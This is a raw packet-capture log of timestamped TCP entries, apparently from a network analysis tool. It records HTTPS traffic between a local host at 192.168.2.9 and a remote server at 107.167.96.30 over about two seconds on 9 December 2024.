                                                                                                                                            Dec 9, 2024 17:39:59.682323933 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.682338953 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.682440996 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.688729048 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.688746929 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.688849926 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.688862085 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.689321041 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.694569111 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.694586992 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.694843054 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.694854975 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.694926977 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.701307058 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.701328993 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.701492071 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.701492071 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.701505899 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.701549053 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.707957983 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.707974911 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.708049059 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.708060026 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.708110094 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.714416027 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.714438915 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.714855909 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.714865923 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.715034008 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.721065044 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.721088886 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.721251011 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.721268892 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.721672058 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.742078066 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.742111921 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.742223024 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.742223978 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.742234945 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.742388010 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.874929905 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.874957085 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.875088930 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.875106096 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.876009941 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.883513927 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.883543968 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.883683920 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.883693933 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.884561062 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.886971951 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.886990070 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.887101889 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.887109995 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.888448000 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.894586086 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.894604921 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.894726992 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.894745111 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.896253109 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.900295019 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.900319099 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.900391102 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.900398970 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.900784969 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.906934023 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.906958103 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.907066107 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.907073975 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.908133030 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.912585974 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.912606001 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.912678003 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.912686110 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.916120052 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.933763027 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.933782101 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.933890104 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.933921099 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.936224937 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.066616058 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.066638947 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.066716909 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.066744089 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.066787958 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.066787958 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.072518110 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.072537899 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.072678089 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.072691917 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.072762966 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.079236031 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.079255104 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.079320908 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.079339027 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.080590963 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.085922956 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.085941076 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.086013079 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.086013079 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.086025000 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.086066961 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.092588902 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.092607975 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.092673063 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.092689991 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.092767954 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.098917007 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.098933935 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.099029064 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.099044085 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.099145889 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.104746103 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.104769945 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.104819059 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.104840994 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.104873896 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.104873896 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.126105070 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.126125097 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.126185894 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.126220942 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.126231909 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.126280069 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.264838934 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.264861107 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.265012026 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.265043020 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.266000032 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.270792961 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.270809889 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.270895004 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.270916939 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.272195101 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.277590036 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.277606964 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.277678967 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.277688026 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.278012037 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.284106970 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.284122944 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.284190893 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.284200907 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.286070108 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.289920092 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.289936066 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.290016890 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.290025949 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.294012070 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.297095060 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.297111034 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.297188044 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.297195911 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.297983885 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.302958012 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.302975893 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.303041935 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.303050995 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.305994987 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.373572111 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.373594046 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.373706102 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.373719931 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.374016047 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.457509041 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.457534075 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.457684994 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.457700014 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.457988977 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.463027000 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.463043928 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.463130951 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.463141918 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.463387966 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.469585896 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.469603062 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.469677925 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.469686985 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.469986916 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.476360083 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.476382971 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.476448059 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.476454973 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.476685047 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.482372046 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.482389927 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.482461929 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.482484102 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.482846022 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.489320040 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.489336967 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.489413977 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.489423037 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.489614010 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.495161057 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.495178938 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.495250940 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.495260954 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.495408058 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.565742970 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.565766096 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.565888882 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.565912962 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.568162918 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.648772001 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.648798943 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.648935080 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.648952007 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.649420023 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.654165030 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.654181004 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.654258013 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.654273033 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.654409885 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.660474062 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.660490990 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.660582066 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.660597086 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.660820961 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.666769981 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.666785955 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.666867971 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.666886091 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.667013884 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.672288895 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.672311068 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.672416925 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.672436953 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.672720909 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.678766966 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.678782940 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.678853035 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.678869009 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.679039955 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.684226036 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.684243917 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.684328079 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.684341908 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.684498072 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.757663965 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.757687092 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.757755995 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.757771969 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.757832050 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.840713978 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.840733051 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.840970039 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.840984106 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.841207027 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.845824003 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.845840931 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.845933914 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.845942974 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.846164942 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.851749897 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.851768017 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.851917982 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.851933002 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.852010965 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.857453108 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.857471943 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.857530117 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.857548952 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.857570887 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.857608080 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.863323927 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.863341093 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.863420010 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.863428116 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.863733053 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.868788958 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.868819952 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.868884087 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.868896961 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.868998051 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.873903036 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.873919010 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.873986959 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.873996019 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.875925064 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.949770927 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.949805021 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.949903965 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.949934006 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.950316906 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.032340050 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.032363892 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.032421112 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.032440901 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.032485008 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.033890009 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.038165092 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.038181067 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.038319111 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.038331032 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.040004015 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.043041945 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.043057919 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.043126106 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.043134928 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.044157028 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.048787117 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.048800945 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.048974991 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.048989058 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.052098036 CET49713443192.168.2.9107.167.96.30
